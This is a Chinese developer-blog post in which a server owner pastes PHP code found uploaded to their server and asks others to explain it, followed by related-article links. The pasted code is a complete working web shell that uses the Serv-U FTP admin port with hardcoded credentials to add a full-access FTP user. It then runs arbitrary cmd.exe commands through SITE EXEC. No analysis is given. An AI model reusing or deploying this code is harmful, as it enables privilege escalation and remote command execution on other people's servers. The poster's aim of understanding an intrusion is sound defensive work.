php 恶意代码分析,解读 PHP恶意代码

最新推荐文章于 2023-04-12 12:44:26 发布
最新推荐文章于 2023-04-12 12:44:26 发布
阅读量217 收藏
点赞数
文章标签: php 恶意代码分析

解读 PHP恶意代码

我的服务器被人传了恶意代码,我看了,看不懂,有谁可以帮我分析一下??

//

//Codez begin

//

//判断magic_quotes_gpc的值

if (get_magic_quotes_gpc()) {

$_GET = stripslashes_array($_GET);

}

//变量初始化

$addr = '0.0.0.0';

$ftpport = 21;

$adminport = 43958;

$adminuser = 'LocalAdministrator';

$adminpass = '#l@$ak#.lk;0@P';

$user = 'suber';

$password = '1234567890';

$homedir = 'C:\\';

$dir = 'C:\\WINNT\\System32\\';

//有改变则赋值

if ($_GET){

$addr = $_GET['addr'] ;

$ftpport = $_GET['ftpport'] ;

$adminport = $_GET['adminport'] ;

$adminuser = $_GET['adminuser'] ;

$adminpass = $_GET['adminpass'] ;

$user = $_GET['user'] ;

$password = $_GET['password'] ;

$homedir = $_GET['homedir'] ;

if ($_GET['dir']){

$dir = $_GET['dir'] ;

}

}

?>

SUU1.5

b {font-family : Verdana, sans-serif;font-size : 14px;}

body,td,p,pre {

font-family : Verdana, sans-serif;font-size : 12px;

}

input {

font-family: "Verdana";

font-size: "11px";

BACKGROUND-COLOR: "#FFFFFF";

height: "18px";

border: "1px solid #666666";

}

SUU1.5

添加Serv-U用户部分

主机IP:
主机Ftp端口:
主机Ftp管理端口:
主机Ftp管理用户:
主机Ftp管理密码:
添加的用户名:
添加的用户名密码:
用户主目录(别忘了写"\"):

命令回显:

//添加用户

if ($_GET['action']=="up"){

up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);

}

?>

执行命令部分
主机Ftp端口:
用户名:
用户名密码:
系统路径(别忘了写"\"):
执行的命令:

命令回显:

//执行命令

if ($_GET['action']=="execute"){

ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);

}

?>

//添加用户主函数定义

function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){

$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);

if (!$fp) {

echo "$errstr ($errno)
\n";

} else {

fputs ($fp, "USER ".$adminuser."\r\n");

sleep (1);

fputs ($fp, "PASS ".$adminpass."\r\n");

sleep (1);

fputs ($fp, "SITE MAINTENANCE\r\n");

sleep (1);

fputs ($fp, "-SETUSERSETUP\r\n");

fputs ($fp, "-IP=".$addr."\r\n");

fputs ($fp, "-PortNo=".$ftpport."\r\n");

fputs ($fp, "-User=".$user."\r\n");

fputs ($fp, "-Password=".$password."\r\n");

fputs ($fp, "-HomeDir=".$homedir."\r\n");

fputs ($fp, "-LoginMesFile=\r\n");

fputs ($fp, "-Disable=0\r\n");

fputs ($fp, "-RelPaths=0\r\n");

fputs ($fp, "-NeedSecure=0\r\n");

fputs ($fp, "-HideHidden=0\r\n");

fputs ($fp, "-AlwaysAllowLogin=0\r\n");

fputs ($fp, "-ChangePassword=1\r\n");

fputs ($fp, "-QuotaEnable=0\r\n");

fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");

fputs ($fp, "-SpeedLimitUp=-1\r\n");

fputs ($fp, "-SpeedLimitDown=-1\r\n");

fputs ($fp, "-MaxNrUsers=-1\r\n");

fputs ($fp, "-IdleTimeOut=600\r\n");

fputs ($fp, "-SessionTimeOut=-1\r\n");

fputs ($fp, "-Expire=0\r\n");

fputs ($fp, "-RatioUp=1\r\n");

fputs ($fp, "-RatioDown=1\r\n");

fputs ($fp, "-RatiosCredit=0\r\n");

fputs ($fp, "-QuotaCurrent=0\r\n");

fputs ($fp, "-QuotaMaximum=0\r\n");

fputs ($fp, "-Maintenance=System\r\n");

fputs ($fp, "-PasswordType=Regular\r\n");

fputs ($fp, "-Ratios=None\r\n");

fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");

fputs ($fp, "QUIT\r\n");

sleep (1);

while (!feof($fp)) {

echo fgets ($fp,128);

}

}

}

//执行命令主函数定义

function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8);

if (!$conn_id) {

echo "$errstr ($errno)
\n";

} else {

fputs ($conn_id, "USER ".$user."\r\n");

sleep (1);

fputs ($conn_id, "PASS ".$password."\r\n");

sleep (1);

fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."\r\n");

fputs ($conn_id, "QUIT\r\n");

sleep (1);

while (!feof($conn_id)) {

echo fgets ($conn_id,128);

}

fclose($conn_id);

}

}

//去除转义字符

function stripslashes_array(&$array) {

while (list($key,$var) = each($array)) {

if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {

if (is_string($var)) {

$array[$key] = stripslashes($var);

}

if (is_array($var)) {

$array[$key] = stripslashes_array($var);

}

}

}

return $array;

}

?>

weixin_39781452
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现清除wordpress里恶意代码
10-23
主要介绍了PHP实现清除wordpress里恶意代码的方法以及相关代码和使用方法,有需要的小伙伴可以参考下。
php快速查找数据库中恶意代码的方法
10-24
主要介绍了php快速查找数据库中恶意代码的方法,可实现针对特殊字符的过滤功能,非常具有实用价值,需要的朋友可以参考下
php 图片中的恶意代码,图片攻击-BMP图片中注入恶意JS代码 <转载>
weixin_33462804的博客
03-27 919
昨天看到一篇文章《hacking throung images》,里面介绍了如何在BMP格式的图片里注入JS代码,使得BMP图片既可以正常显示, 也可以运行其中的JS代码,觉得相当有趣。 执行JS注入的脚本 关键:构造符合正常BMP格式的图片 步骤 1. 将原BMP文件的第三,第四字节替换为\x2F\x2A, 对应js中的注释符号/* BMP文件的第三、四、五、六字节表示BMP文件的大小 2. 在...
PHP 安全漏洞:会话劫持、跨站点脚本、SQL 注入以及如何修复它们
allway2的博客
08-01 1413
SQL注入是应用程序中的一个漏洞,它是由于程序员在将输入包含到数据库的查询中之前没有对其进行清理而导致的。通过这种类型的访问,攻击者可以做非常糟糕的事情。您使用的确切功能取决于您使用的数据库类型和php库,请查看php库的文档以获取有关转义用户输入的更多信息。如果您想更好地控制清理工作的方式,另一种选择是编写自己的HTML清理函数,不建议PHP初学者这样做,因为错误会使您的网站易受攻击。会话劫持是由攻击者获得对用户会话标识符的访问权并能够使用另一个用户的帐户来冒充他们而导致的漏洞。...
PHP漏洞全解(三)-客户端脚本植入
04-11 750
本文主要介绍针对PHP网站的客户端脚本植入攻击方式。所谓客户端脚本植入攻击,是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,黑客所植入的脚本就会被执行,进而开始攻击。 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。 可
以下是一个简单的PHP漏洞代码,供分析漏洞之用。
STARH666的博客
03-11 148
当攻击者上传包含恶意代码的文件时,他们可以执行任意的代码,包括删除、修改、插入或查询数据等操作,从而导致安全问题。我们还可以使用其他安全编程实践,如访问控制和权限管理,以确保应用程序只能访问和操作必要的文件和资源,从而避免恶意访问和攻击。对于PHP开发人员,了解和掌握安全编程的知识和技能是非常重要的,以确保应用程序的安全性和可靠性。例如,如果攻击者上传一个包含恶意代码PHP文件,该文件可以执行任意的系统命令,从而使攻击者获得系统的完全控制权。以下是一个简单的PHP漏洞代码,供分析漏洞之用。
php恶意代码,php 恶意代码过滤函数_PHP教程
weixin_35084652的博客
03-11 197
php 恶意代码过滤函数Public Function DecodeFilter(html, filter)html=LCase(html)filter=split(filter,”,”)For Each i In filterSelect Case iCase “SCRIPT” ‘ 去除所有客户端脚本javascipt,vbscript,jscript,js,vbs,e...
PHP恶意刷新实现代码
10-29
经常会做统计的时候会遇到恶意刷新的人,用此来增加统计数量,以下PHP代码实现了防恶意刷新的效果,上代码
微信自定义分享php代码分析
01-20
步骤三要参数微信的参数,除了appId之外,其他的参数都是动态的,这里,我用的php语言,在后端生成的参数,代码如下: php代码: public function getwxinfo(){ $dataurl = I('dataurl'); include('./ThinkPHP...
PHPQA利用一个命令分析PHP代码
08-07
PHPQA - 利用一个命令分析PHP代码,一个用于运行QA工具的工具 (phploc, phpcpd, phpcs, pdepend, phpmd, phpmetrics)
PHP恶意软件检测器-PHP开发
05-27
PHP恶意软件检测器智能PHP漏洞检测器Web模式:控制台模式:使用PHP恶意软件检测器要求PHP 5.4+通过composer安装php-malware-detector。 PHP恶意软件检测器智能PHP漏洞检测器Web模式:控制台模式:使用PHP恶意软件检测器要求PHP 5.4+通过composer安装php-malware-detector。 #安装Composer curl -sS https://getcomposer.org/installer | php接下来,运行Composer命令以安装最新稳定版本的php-malware-detector:php composer.phar require ollyxar / php-malware-detector安装后,您需要使用Composer的自动加载器并运行扫描:require'vendor
MediaCTDependencyGuard是一个PHP静态代码分析
08-08
MediaCT Dependency Guard是一个PHP静态代码分析器,用于确定您的软件包是否依赖于作为开发人员和/或测试环境的副作用而安装的代码
wordpress恶意代码解决方法分享
09-29
发现自己的测试站的主题带上了恶意代码,非常明显的就是出现了一个函数_verifyactivate_widgets,通常情况下,一旦出现了这个函数在你的主题中,使用PHP可以任意的获取用户名、博客的主题文件等等,下面是解决方法
Mondrian使用图论的php代码静态分析工具
08-08
Mondrian - 使用图论的php代码静态分析工具
PHP代码审计文档.zip
11-02
第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课...
php恶意代码,php快速查找数据库中恶意代码的方法,快速查找恶意代码_PHP教程...
weixin_36333122的博客
03-11 212
php快速查找数据库中恶意代码的方法,快速查找恶意代码本文实例讲述了php快速查找数据库中恶意代码的方法。分享给大家供大家参考。具体如下:数据库被输入恶意代码,为了保证你的数据库的安全,你必须得小心去清理。有了下面一个超级方便的功能,即可快速清除数据库恶意代码。function cleanInput($input) {$search = array('@]*?>.*?@si', // Str...
10 个 PHP 代码安全漏洞扫描程序
allway2的博客
08-01 4468
PHP核心是安全的,但除此之外还有很多其他内容,您可能正在使用它们,并且可能容易受到攻击。在开发了网站或复杂的Web应用程序之后,大多数开发人员和网站所有者都专注于功能、设计、SEO,而他们忘记了必不可少的组件——。作为最佳实践,您应该考虑在上线之前对您的应用程序执行安全扫描。这适用于任何网站——无论大小。有一些工具可以帮助你。PMF(PMF)是一种自托管解决方案,可帮助您在文件中查找可能的恶意代码。众所周知,它可以检测狡猾的、编码器、混淆器、webshellcode。...
PHP 代码审计常规漏洞的步骤和技巧
weixin_62369433的博客
04-12 499
在这个数字化时代,安全已经成为最重要的关键词之一。对于开发人员和安全专业人员来说,代码审计是确保应用程序和服务安全性的一项重要任务。通过审计,可以发现并修复各种类型的漏洞,包括 SQL 注入、XSS、CSRF、文件上传漏洞等。愿你们在代码审计的道路上勇往直前,不断学习和探索,找到应用程序中的所有漏洞,并将其修复,为我们的数字世界带来更加安全可靠的服务。
php恶意代码,小心WordPress主题functions.php包含的恶意代码
weixin_35867508的博客
03-11 230
昨天在给朋友做一个定制主题的时候,在functions.php发现了一段非常奇怪的代码。自己也忘了是怎么出现的。我随便找了个函数百度了一下,发现中招的人真是不少啊。原来这段包含在functions.php代码是已经流行了一段时间的恶意代码。这段代码会自动循环感染你所有的WordPress主题functions.php文件。所以发出来给大家做个参考。有碰到类似的朋友记得一定要删除。这段代码是被加在...
moodle php代码解读
最新发布
06-03
Moodle 是一个基于 PHP 的开源学习管理系统,以下是 Moodle 的 PHP 代码解读: 1. 配置文件:Moodle 使用 config.php 文件来存储系统的配置信息。在这个文件中,定义了数据库连接信息、文件路径、常量等。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值